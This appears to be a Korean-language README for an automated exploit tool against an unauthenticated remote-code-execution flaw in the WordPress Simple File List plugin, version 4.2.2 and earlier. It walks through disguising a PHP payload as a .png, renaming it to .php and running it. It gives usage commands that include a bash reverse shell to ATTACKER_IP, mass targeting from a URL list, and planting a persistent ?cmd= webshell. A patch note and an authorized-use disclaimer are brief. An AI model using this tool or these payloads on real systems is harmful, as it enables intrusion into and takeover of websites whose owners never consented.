
CVE-2025-34085에 대한 익스플로잇
CVE-2025-34085(CVE-2020-36847의 중복)에 대한 자동 익스플로잇입니다. 이는 WordPress Simple File List 플러그인 버전 ≤ 4.2.2에서 발생하는 심각한 인증되지 않은 원격 코드 실행 취약점입니다.
참고: CVE-2025-34085는 MITRE에 의해 CVE-2020-36847의 중복으로 거부되었습니다. 취약점은 실제이며 버전 4.2.3에서 패치되었습니다. 두 CVE ID는 동일한 근본 문제를 나타냅니다.
| 필드 | 세부사항 |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| 플러그인 | Simple File List |
| 영향 받는 버전 | ≤ 4.2.2 |
| 수정된 버전 | 4.2.3 |
| 유형 | 무제한 파일 업로드 → 이름 변경 우회 → RCE |
| CVSS | 9.8 (심각) |
| 인증 | 필요 없음 |
| 최초 발견자 | coiffeur |
| Metasploit 모듈 | exploit/multi/http/wp_simple_file_list_rce |
업로드 — PHP 페이로드가 .png 파일로 위장하여 플러그인의 업로드 엔드포인트(ee-upload-engine.php)를 통해 업로드됩니다. 업로드 엔진은 확장자를 검증하지만 이미지 파일을 허용합니다.
이름 변경 — 플러그인의 이름 변경 기능(ee-file-engine.php)은 확장자 제한을 적용하지 않습니다. 공격자는 .png를 .php(또는 .phtml, .php5, .php3)로 이름을 변경합니다.
실행 — 이제 이름이 변경된 PHP 파일은 /wp-content/uploads/simple-file-list/의 업로드 디렉토리에서 접근 및 실행 가능해지며, 공격자에게 임의 명령 실행을 제공합니다.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
각 줄에 하나의 URL이 있는 targets.txt 파일을 만드십시오:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
팁: 리버스 셸이 필요하거나 대상에 쿼리 문자열 필터링이 있을 때
--inline을 사용하세요.--inline없이 익스플로잇은?cmd=를 통해 명령을 받는 웹셸을 떨어뜨립니다.
성공적인 익스플로잇은 vuln.txt에 기록됩니다:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.php에 지속됩니다vuln.txt에 기록됩니다 — 보고서에 유용합니다?cmd=가 있는 지속적인 웹셸을 남기지 않도록 리버스 셸과 함께 --inline을 사용하세요Simple File List 플러그인을 버전 4.2.3 이상으로 업그레이드하십시오.
이 도구는 공인된 침투 테스트 및 교육 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 전에 항상 적절한 권한을 얻으십시오.
| 인수 | 설명 | 기본값 |
|---|
-u, --url | 단일 대상 URL | — |
--cmd | 대상에서 실행할 명령 | id |
--inline | PHP 셸에 명령을 직접 주입(하드코딩, ?cmd= 웹셸 없음) | False |